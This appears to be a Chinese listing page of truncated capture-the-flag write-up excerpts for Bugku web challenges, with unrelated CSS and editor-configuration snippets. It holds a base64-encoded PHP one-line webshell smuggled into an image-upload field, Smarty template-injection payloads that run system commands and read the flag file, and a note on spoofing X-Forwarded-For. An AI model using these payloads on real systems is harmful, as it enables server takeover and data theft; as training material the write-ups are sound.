Bugku-web安慰奖（序列化）

注入点在上传图片处，图片上传后会被base64编码，就从这里入手，上传一句话木马；image=data%3Aimage%2Fphp%3Bbase64%2CPD9waHAgZXZhbCgkX1BPU1RbJ2ZsYWcnXSk7Pz4=......

smarty模板注入常用的payload常用payload常用payload{ifphpinfo()}{/if}{ifsystem('ls')}{/if}{ifreadfile('/flag')}{/if}{ifshow_source('/flag')}{/if}{ifsystem('cat../../../flag')}{/if}smarty中的{if}标签中可以执行php语句随便传参可......

页面空空如也时 抓包入参为两个时，很可能一个是表示函数，另一个表示函数的参数可以使用file_get_contents(index.php)查看页面源码源码函数很多，无从下手时，尝试反序列化，下面这段代码可以直接放在phpstudy的www文件目录下，启动phpstudy后，直接打开localhost/xxx.php<?phpclass......

以下是对字体图标、2D转换、3D转换、动画rem、vw/vh、Flex布局模型、Less基础语法、视口分辨率、二倍图、移动适配、媒体查询、媒体查询bootstrap框架、栅格系统、组件和响应式网页布局的详细描述，并附上一些相关的代码示例。字体图标：字体图标是使用特殊字体文件中的字符来显示......

​ 1.编辑器修改(可选)1.1在 ueditor/config.json 中添加代码块    /* 上传word配置 */    "wordActionName":"wordupload",/* 执行上传视频的action名称 */    "wordFieldName":"upfile",/* 提交的视频表单名称 */    "wordPathFormat":"/p......

刚结束的ciscn，里面的要是有这么简单就好了。下载附件，是个pcap文件，打开wireshark分析一节一节看过去就找到了flag没难度的~~~......

根据题意进行unescape解码，得到js脚本，将js脚本中的代码填入输入框中点击提交就得到了flag......

没啥思路，感觉自己在刷题，，，这个考虑的是本地管理员查看源码可以知道密码是base64加密的，使用工具解码就可以了！账号是admin，从评论里知道的...打开burp抓包，修改X-Forwarded-For:127.0.0.1即可......

没啥思路，在这个网站上不能右键弹出属性框，F12查看也没啥可看的，所以就去看了看评论，大概的套路有了，就只有实践了先安装dirsearch：https://github.com/maurosoria/dirsearch进入GitHub下载zip包，我拖到了kali里面安装，因为在wndows中解压输入命令就弹出dirsearch.py的文本文件，做完......

这个很简单！！！看了查看器，里面啥也没有，就看看网络，点开发现了flag......